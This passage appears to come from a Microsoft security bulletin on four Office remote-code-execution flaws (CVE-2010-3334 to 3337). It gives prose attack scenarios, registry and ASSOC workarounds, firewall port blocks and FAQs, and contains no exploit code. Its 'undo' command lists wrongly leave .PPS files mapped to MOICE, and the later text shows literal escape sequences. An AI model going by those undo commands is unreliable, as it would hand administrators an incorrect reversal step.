ASSOC .xls=Excel.Sheet.8
ASSOC .xlt=Excel.Template
ASSOC .xla=Excel.Addin

For PowerPoint, run the following commands from a command prompt:
ASSOC .ppt=PowerPoint.Show.8
ASSOC .PPS=oice.powerpoint.slideshow
ASSOC .pps=PowerPoint.SlideShow.8

Note: On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.

• Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources

Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.

FAQ for Office Art Drawing Records Vulnerability - CVE-2010-3334

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
When a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?
This vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.

In an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.

In a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.

What systems are primarily at risk from the vulnerability?
Systems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.

What does the update do?
The update addresses the vulnerability by modifying the way that Microsoft Office software parses files.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

Drawing Exception Handling Vulnerability - CVE-2010-3335

A remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3335.

Mitigating Factors for Drawing Exception Handling Vulnerability - CVE-2010-3335

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

• The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message.

• An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

• In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site, and then convince them to open the specially crafted Office file.

Workarounds for Drawing Exception Handling Vulnerability - CVE-2010-3335

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Word from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note: Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.

For Office 2010

Open Word 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - Word 2003 Binary Documents and Templates
   - Word XP Binary Documents and Templates
   - Word 2000 Binary Documents and Templates
   - Word 97 Binary Documents and Templates
   - Word 95 Binary Documents and Templates
   - Word 6.0 Binary Documents and Templates
   - Word 2 and earlier Binary Documents and Templates
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open Word 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Excel from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note: Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved.
Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Office 2007 must be applied.

For Office 2010

Open Excel 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - Excel 2007 and later Binary Workbooks
   - Excel 97-2003 Add-in Files
   - Excel 97-2003 Workbooks and Templates
   - Excel 95-97 Workbooks and Templates
   - Excel 95 Workbooks
   - Excel 4 Workbooks
   - Excel 4 Worksheets
   - Excel 3 Worksheets
   - Excel 2 Worksheets
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open Excel 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft PowerPoint from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note: Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved.
Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note: In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.

For Office 2010

Open PowerPoint 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - PowerPoint 97-2003 Presentations, Shows, Templates and Add-in Files
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open PowerPoint 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources

The Microsoft Office Isolated Conversion Environment (MOICE) helps protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.

To install MOICE, you must have Office 2003 or Office 2007 installed.

To install MOICE, you must also have the Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats.
The compatibility pack is available as a free download from the Microsoft Download Center.

MOICE requires all updates that are recommended for all Office programs. Visit Microsoft Update to install all recommended updates.

Enable MOICE

Note: See Microsoft Knowledge Base Article 935865 to use the automated Microsoft Fix it solution to enable or disable this workaround.

To manually enable MOICE, run the commands as specified in the following table. Running the commands will associate the Office application extensions with MOICE.

Command to enable MOICE to be the registered handler

For Word, run the following command from a command prompt:
ASSOC .doc=oice.word.document

For Excel, run the following commands from a command prompt:
ASSOC .XLS=oice.excel.sheet
ASSOC .XLT=oice.excel.template
ASSOC .XLA=oice.excel.addin

For PowerPoint, run the following commands from a command prompt:
ASSOC .PPT=oice.powerpoint.show
ASSOC .POT=oice.powerpoint.template
ASSOC .PPS=oice.powerpoint.slideshow

Note: On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.

For more information on MOICE, see Microsoft Knowledge Base Article 935865.

Impact of workaround. Office 2003 and earlier formatted documents that are converted to the Microsoft Office 2007 Open XML format by MOICE will not retain macro functionality. Additionally, documents with passwords or that are protected with Digital Rights Management cannot be converted.

How to undo the workaround. Run the commands to disable MOICE as specified in the table below.

Command to disable MOICE as the registered handler

For Word, run the following command from a command prompt:
ASSOC .doc=Word.Document.8

For Excel, run the following commands from a command prompt:
ASSOC .xls=Excel.Sheet.8
ASSOC .xlt=Excel.Template
ASSOC .xla=Excel.Addin

For PowerPoint, run the following commands from a command prompt:
ASSOC .ppt=PowerPoint.Show.8
ASSOC .PPS=oice.powerpoint.slideshow
ASSOC .pps=PowerPoint.SlideShow.8

Note: On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.

• Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources

Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.

FAQ for Drawing Exception Handling Vulnerability - CVE-2010-3335

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
When a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?
This vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.

In an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.

In a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.

What systems are primarily at risk from the vulnerability?
Systems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.

What does the update do?
The update addresses the vulnerability by modifying the way that Microsoft Office parses Office files.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

MSO Large SPID Read AV Vulnerability - CVE-2010-3336

A remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3336.

Mitigating Factors for MSO Large SPID Read AV Vulnerability - CVE-2010-3336

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

• The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message.

• An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

• In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site, and then convince them to open the specially crafted Office file.

Workarounds for MSO Large SPID Read AV Vulnerability - CVE-2010-3336

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources

Do not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.

FAQ for MSO Large SPID Read AV Vulnerability - CVE-2010-3336

What is the scope of the vulnerability?
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
When a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?
This vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.

In an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.

In a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.

What systems are primarily at risk from the vulnerability?
Systems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.

What does the update do?
The update addresses the vulnerability by modifying the way that Microsoft Office parses files.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

Insecure Library Loading Vulnerability - CVE-2010-3337

A remote code execution vulnerability exists in the way that Microsoft Office handles the loading of DLL files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3337.

Mitigating Factors for Insecure Library Loading Vulnerability - CVE-2010-3337

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.
The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFor an attack to be successful using an untrusted remote file system location or WebDAV share, a user must be convinced to open a PowerPoint presentation located on the remote file system location or WebDAV share. An attacker would have no way to force users to visit an untrusted remote file system location or WebDAV share. Instead, an attacker would have to convince them to visit the untrusted remote file system location or WebDAV share, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes them to the untrusted remote file system location or WebDAV share.\r\n\u2022\t\r\n\r\nThe file sharing protocol SMB is often disabled on the perimeter firewall. This limits the potential attack vectors.\r\n\t\r\nWorkarounds for Insecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable loading of libraries from WebDAV and remote network shares\r\n\r\nNote See Microsoft Knowledge Base Article 2264107 to deploy a workaround tool that allows customers to disable the loading of libraries from remote network or WebDAV shares. This tool can be configured to disallow insecure loading on a per-application or a global system basis.\r\n\r\nCustomers who are informed by their vendor of an application being vulnerable can use this tool to help protect against attempts to exploit this issue.\r\n\r\nNote See Microsoft Knowledge Base Article 2264107 to use the automated Microsoft Fix it solution to deploy the registry key to block loading of libraries for SMB and WebDAV shares. 
Note that this Fix it solution does require you to install the workaround tool also described in Microsoft Knowledge Base Article 2264107 first. This Fix it solution only deploys the registry key and requires the workaround tool in order to be effective. We recommend that administrators review the KB article closely prior to deploying this Fix it solution.\r\n\u2022\t\r\n\r\nDisable the WebClient service\r\n\r\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\r\n\r\nTo disable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Disabled. If the service is running, click Stop.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\r\nImpact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. 
For example, WebDAV shares will be inaccessible from the client computer.\r\n\r\nHow to undo the workaround.\r\n\r\nTo re-enable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Automatic. If the service is not running, click Start.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see the TechNet article, TCP and UDP Port Assignments.\r\n\r\nImpact of workaround. Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. 
Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\n\t\r\nFAQ for Insecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability requires a user to open a document contained within the same working directory as a specially crafted DLL file. The specially crafted DLL will be loaded into memory giving the attacker control of the affected system in the security context of the logged-on user.\r\n\r\nIs this vulnerability related to the issue described in Microsoft Security Advisory 2269637? \r\nYes, this vulnerability is related to the class of vulnerabilities that affect how applications load external libraries described in Microsoft Security Advisory 2269637. This security bulletin addresses a particular instance of this type of vulnerability.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? 
\r\nThis vulnerability requires that a user open an office document in the same working directory as a specially crafted DLL file.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by convincing a user to place an Office file in the same folder as a specially crafted DLL file, and then convincing the user to open the Office file. When the user opens the Office file the specially crafted DLL file, which is contained in the same directory as the Office file, will be loaded.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nHow is Microsoft Office affected by this vulnerability? \r\nAlthough the known attack vectors can only leverage Microsoft PowerPoint, the vulnerable code exists in a shared component of Microsoft Office.\r\n\r\nWhat does the update do? \r\nThis update addresses the vulnerability by helping to ensure the vulnerable component of Microsoft Office uses a more appropriate and secure search order when loading libraries.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nteam509, working with VeriSign iDefense Labs, for reporting the RTF Stack Buffer Overflow Vulnerability (CVE-2010-3333)\r\n\u2022\t\r\n\r\nDyon Balding of Secunia for reporting the Office Art Drawing Records Vulnerability (CVE-2010-3334)\r\n\u2022\t\r\n\r\nWill Dorman of CERT Coordination Center for reporting the Office Art Drawing Records Vulnerability (CVE-2010-3334)\r\n\u2022\t\r\n\r\nTippingPoint's Zero Day Initiative for reporting the Drawing Exception Handling Vulnerability (CVE-2010-3335)\r\n\u2022\t\r\n\r\nChaouki Bekrar of VUPEN Vulnerability Research Team for reporting the MSO Large SPID Read AV Vulnerability (CVE-2010-3336)\r\n\u2022\t\r\n\r\nHaifei Li of Fortinet\u2019s FortiGuard Labs for reporting the Insecure Library Loading Vulnerability (CVE-2010-3337)\r\n\u2022\t\r\n\r\nSimon Raner of ACROS Security for reporting the Insecure Library Loading Vulnerability (CVE-2010-3337)\r\n\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. 
To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
